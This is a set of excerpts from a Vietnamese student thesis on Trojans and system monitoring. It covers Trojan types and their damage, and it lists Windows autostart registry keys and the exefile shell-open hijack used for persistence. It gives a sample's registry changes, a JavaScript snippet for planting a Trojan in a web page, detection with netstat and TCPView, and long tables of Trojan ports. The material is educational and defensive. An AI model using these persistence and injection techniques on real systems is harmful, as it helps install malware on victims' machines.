1
LỜI NÓI ĐẦU
2
Từ xưa đến nay vấn đề thông tin là cực kỳ quan trọng, làm chủ được
thông tin là nắm được thành công, nếu không làm chủ được thông tin thì sẽ
bị thất bại. Chính vì vậy, có rất nhiều người tìm cách lấy thông tin bằng
mọi cách mà Trojan là một công cụ hàng đầu. Với ưu điểm: Dung lượng
nhỏ, thông minh, dễ sử dụng và hiệu quả cao, Trojan đã thực sự trở thành
mối đe dọa nguy hiểm đối với bất kì một hệ thống nào. Tuy nhiên, với sự
phát triển vượt bậc của khoa học công nghệ Trojan đã không còn chỉ là vũ
khí riêng của Hacker mà còn là công cụ hữu hiệu để cho các nhà quản trị
giám sát hệ thống mạng. Việc sử dụng Trojan để giám sát đang ngày càng
phổ biến ở các nước có ngành CNTT phát triển. Công cụ giám sát này vừa
đem lại cho người quản trị một hệ thống giám sát hoàn chỉnh, đồng thời
làm tăng khả năng bảo mật an toàn thông tin cho các trao đổi thông tin trên
mạng.
Trong những năm gần đây, ở nước ta, việc ứng dụng mạng máy tính
vào nhiệm vụ của các tổ chức, đơn vị ngày càng tăng, các ứng dụng được
xây dựng ngày càng nhiều về số lượng, phạm vi ứng dụng sâu và rộng hơn
và đem lại hiệu quả rõ rệt. Bên cạnh những lợi ích to lớn mà mạng và các
dịch vụ, phần mềm trên mạng đem lại thì có một vấn đề hết sức quan trọng
mang tính thời sự đặt ra là việc quản lý, điều hành và bảo mật cho các dịch
vụ, các ứng dụng, các thông tin được trao đổi trên đường truyền. Đòi hỏi
người quản trị phải có một hệ thống với các công cụ giám sát toàn diện,
đồng thời phải có những hiểu biết sâu sắc về các phương thức tấn công của
Hacker.
Từ những yêu cầu có tính cấp thiết trên, em chọn đề tài “Xây dựng
công cụ giám sát hệ thống” làm đề tài cho đồ án tốt nghiệp của mình.Trong
quá trình thực hiện, em xin chân thành cảm ơn sự giúp đỡ tận tình của thầy
giáo hướng dẫn PGS.TS. để em có thể hoàn thành đồ án tốt nghiệp của
mình.

gây hại:
5
• Tiếp tục thực thi các chức năng của chương trình mà nó bám vào,
bên cạnh đó thực thi các hoạt động gây hại một cách riêng biệt (ví dụ
như gửi một trò chơi dụ cho người dùng sử dụng, bên cạnh đó là một
chương trình đánh cắp Password).
• Tiếp tục thực thi các chức năng của chương trình mà nó bám vào,
nhưng sửa đổi một số chức năng để gây tổn hại (ví dụ như một
Trojan giả lập một cửa sổ login để lấy password) hoặc che dấu các
hành động phá hoại khác (ví dụ như Trojan che dấu cho các tiến
trình độc hại khác bằng cách tắt các hiển thị của hệ thống).
• Thực thi luôn một chương trình gây hại bằng cách núp dưới danh
một chương trình không có hại (ví dụ như một Trojan được giới
thiệu như là một chò chơi hoặc một tool trên mạng, người dùng chỉ
cần kích hoạt file này là lập tức dữ liệu trên PC sẽ bị xoá hết).
1.2.Trojan nguy hiểm như thế nào?
Nhiều nguời không biết Trojan là gì thì suy nghĩ rằng khi chạy
chúng, họ không thấy điều gì xảy ra, và họ cho rằng Trojan không có gì
nguy hiểm, bởi vì máy tính của họ vẫn làm việc và tất cả dữ liệu vẫn còn
đó, nếu đó là một con virus thì dữ liệu đã có thể mất sạch hay máy đã
ngưng hoạt động hoặc gặp sự cố.
Khi máy nạn nhân(Victim) bị nhiễm Trojan thì tất cả dữ liệu trên
máy đều có thể bị nguy hiểm, thường thì khi Trojan nhiễm vào máy nó sẽ
gây ra các tác hại điển hình sau:
- Xóa hay viết lại các dữ liệu trên máy tính.
- Làm hỏng chức năng của các tệp.
- Lây nhiễm các phần mềm ác tính khác như là virus.
- Cài đặt để máy có thể bị điều khiển bởi máy khác.
- Đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác
- Ăn cắp thông tin như là mật khẩu và số thẻ tín dụng.

Những con Trojan này rất dễ sử dụng.Chỉ cần nạn nhân bị nhiễm
Trojan và hacker có IP của nạn nhân thì hacker đã có thể truy cập toàn
quyền trên máy nạn nhân.Tùy loại Trojan mà chức năng của nó khác
nhau(download, upload file, thực hiện lệnh …).
Các Trojan nổi tiếng loại này như : netbus, back orifice …
Hình 1.2: Trojan NetBus 1.70
1.4.2.Trojan gửi mật khẩu
Mục đích của Trojan này là đọc tất cả mật khẩu lưu trong cache và
thông tin về máy Victim rồi gửi về cho hacker mỗi khi Victim online.
Những mật khẩu cho IRC, FTP, HTTP hoặc các ứng dụng khác yêu cầu
8
người dùng phải nhập login và Password hầu hết các địa chỉ email gửi về
thường nằm ở trên các website free.
Các Trojan nổi tiếng loại này như: barok, kuang, bario …
1.4.3.Keyloggers
Đây là loại Trojan rất đơn giản. Nó chỉ làm một việc đó là ghi lại tất
cả các hành động trên bàn phím của Victim và sau đó gửi cho kẻ tấn công
(Attacker) tìm kiếm password hoặc các dữ liệu nhạy cảm. Hầu hết chúng
thực hiện cả 2 chức năng ghi lại khi online và offline và tất nhiên sau đó
chúng được cấu hình để gửi file log tới một địa chỉ email hàng ngày.
Các Trojan nổi tiếng loại này như: Perfect Keylogger,sys…
Hình 1.3: Perfect Keylogger
1.4.4.Trojan phá hủy(Destructive)
9
Loại Trojan này chỉ có một chức năng là phá hủy và xóa các files.
Chúng rất đơn giản và dễ sử dụng. Chúng có thể tự động xóa tất cả các file
lõi của hệ thống (ví dụ như file: .dll, .ini,.exe,…) trên máy của Victim.
Trojan này thường được kích hoạt bởi kẻ tấn công hoặc đôi khi chúng hoạt
động như một quả bom hẹn giờ.
1.4.5.Trojan FTP

Trojan.exe thì C:\Windows\Start Menu\Programs\startup\Trojan.exe.
- Trong file C:\windows\Win.ini tại dòng lệnh load= Trojan.exe
hoặc run = Trojan.exe.
- Trong file c:\windows\system.ini sau dòng lệnh shell =
Explorer.exe Trojan.exe. Trojan sẽ tự động chạy khi file
Explorer.exe chạy.
- Trong Autoexec.bat :c:\ \Trojan.exe.
- Explorer Startup : c\explorer.exe, c:\ \Trojan.exe.
- Tạo một khóa trong registry :
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\Run] "Info"="c:\directory\Trojan.exe".
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\RunOnce] "Info"="c:\directory\Trojan.exe".
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\RunServices] "Info"="c:\directory\Trojan.exe".
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\RunServicesOnce] "Info"="c:\directory\Trojan.exe".
11
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\R
un] "Info"="c:\directory\Trojan.exe".
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\R
unOnce] "Info"="c:\directory\Trojan.exe".
- Trong Registry Shell Open
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\co
mmand]
Một khóa với giá trị "%1 %*" sẽ được đặt tại đó và nếu có một vài
file chạy đặt tại đó, nó sẽ chạy mỗi khi bạn mở một file nhị phân.Nó được
sử dụng như: Trojan.exe "%1 %*" điều này sẽ khởi động Trojan.
- Trong ActiveX

entVersion\Run\"Heiku - Munist" =
"C:\WINDOWS\system32\EraleuH.exe"
Việc tiếp theo là nó sẽ làm ẩn đi tính năng registry tools and the
folder options trong Window Explorer :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
entVersion\policies\Explorer\"NoFolderOptions" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Policies\System\"DisableRegistryTools" = "1"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Defa
ultIcon\"(default)" = "C:\WINDOWS\system32\filesrv32.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
entVersion\"IeakHelpString" = "I will always be with you, Huelar!"
13
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\"EnableHeikus" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\"InstallDate" = "1/15/2008"
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\"Window Title" = "Freak-X Browser"
Tự động thêm vào regedit những khóa sau :
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\"Local Page" =
"[http://]www.hentaisailormoon.com[REMOVED]"
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\"Start Page" =
"[http://]www.hentaisailormoon.com[REMOVED]"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Explorer\Advanced\"Hidden" = "0"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Explorer\Advanced\"HideFileExt" = "1"

Các file sau khi download về sẽ được lưu tại các vị trí sau :
C:\Documents and Settings\All Users\winsql.dat
C:\Documents and Settings\All Users\DirectX.aud
C:\Documents and Settings\All Users\services.exe
C:\Documents and Settings\All Users\comctl64.dll
Khi nó đã download thành công các file cần thiết thì các file này sẽ
bắt đầu hoạt động
Khôn ngoan hơn, con Trojan này cũng mở một đường link mà người
dùng không hề biết hay đồng ý :
http://pag*****.terra.com.br/arte/so /cartao059.htm
15
Để giúp cho việc kết nối giữa Trojan và chủ nhân của nó thì một số
Trojan sau này phần dữ liệu của nó còn lưu thêm 2 phần để kiểm tra tên và
mật khẩu.
1.6.Cách đính kèm Trojan vào Website,Email
1.6.1.Cách đính kèm Trojan vào Website
Có rất nhiều cách để đính kèm Trojan vào Website sau đây là một số
hình thức phổ biến:
 Dùng một đoạn mã Javascript để mở và phát tán Trojan.
Ví dụ:
Chèn đoạn mã sau: <SCRIPT language=javascript> open(“địa chỉ
con Trojan”);</SCRIPT>.
Đoạn mã trên chèn vào thẻ body của 1 trang website, khi nạn nhân
mở website Trojan sẽ mở ra và yêu cầu người lướt website mở ra.
 Sử dụng phần mềm đính Trojan
Nổi tiếng nhất là phần mềm GodWill phần mềm này cho phép thực
hiện nhiều chức năng đính kèm Trojan.
16
Hình 1.4: Godwill phần mềm đính kèm Trojan
1.6.2.Cách đính kèm Trojan vào Email

cổng nào đó.
- Một chương trình đang chạy sẽ phải có Tên trong Process List.
Một chương trình Trojan sẽ luôn chạy cùng lúc khi máy tính khởi động.
1.7.1.Phát hiện Port sử dụng bởi Trojans
- Dùng câu lệnh Netstat – an trong Windows để biết hệ thống đang
lắng nghe trên các Port nào.
18
Hình 1.5: Netstat -an
+ Hình trên chúng ta thấy có Port 666 là Port của Trojan RST
- Dùng phần mềm Fport, TCPView: Để xem toàn bộ các Port đang sử
dụng và chương trình nào đang sử dụng Port nào. Từ đây có thể kiểm
tra các dịch vụ mạng với những Port nghi ngờ có thể dùng FireWall
để đóng lại.
19
Hình 1.6:TCPView theo dõi cổng kết nối
Một số cổng mà Trojan thường sử dụng:
Silencer|1001
Shivka-Burka|1600
SpySender|1807
Shockrave|1981
WebEx|1001
20
Doly Trojan|1011
Psyber Stream Server|1170
Ultors Trojan|1234
VooDoo Doll|1245
FTP99CMP|1492
BackDoor|1999
Trojan Cow|2001
Ripper|2023

Portal of Doom 3.x|9875
Portal of Doom 4.x|10067
Portal of Doom 5.x|10167
iNi-Killer|9989
Senna Spy|11000
Progenic Trojan|11223
Hack?99 KeyLogger|12223
GabanBus|1245
NetBus|1245
Whack-a-mole|12361
Whack-a-mole 1.x|12362
Priority|16969
Millennium|20001
NetBus 2 Pro|20034
GirlFriend|21544
Prosiak|22222
Prosiak|33333
Evil FTP|23456
Ugly FTP|23456
22
Delta|26274
Back Orifice|31337
Back Orifice|31338
DeepBO|31338
NetSpy DK|31339
BOWhack|31666
BigGluck|34324
The Spy|40412
Masters Paradise|40421
Masters Paradise 1.x|40422

Pass Ripper |2023
Attack FTP |666
GirlFriend | 21554
Fore, Schwindler| 50766
Tiny Telnet Server| 34324
Kuang |30999
Senna Spy Trojans| 11000
WhackJob | 23456
Phase0 | 555
BladeRunner | 5400
IcqTrojan | 4950
InIkiller | 9989
PortalOfDoom | 9872
ProgenicTrojan | 11223
Prosiak 0.47 | 22222
RemoteWindowsShutdown | 53001
RoboHack |5569
24
Silencer | 1001
Striker | 2565
TheSpy | 40412
TrojanCow | 2001
UglyFtp | 23456
WebEx |1001
Backdoor | 1999
Phineas | 2801
Psyber Streaming Server | 1509
Indoctrination | 6939
Hackers Paradise | 456
Doly Trojan | 1011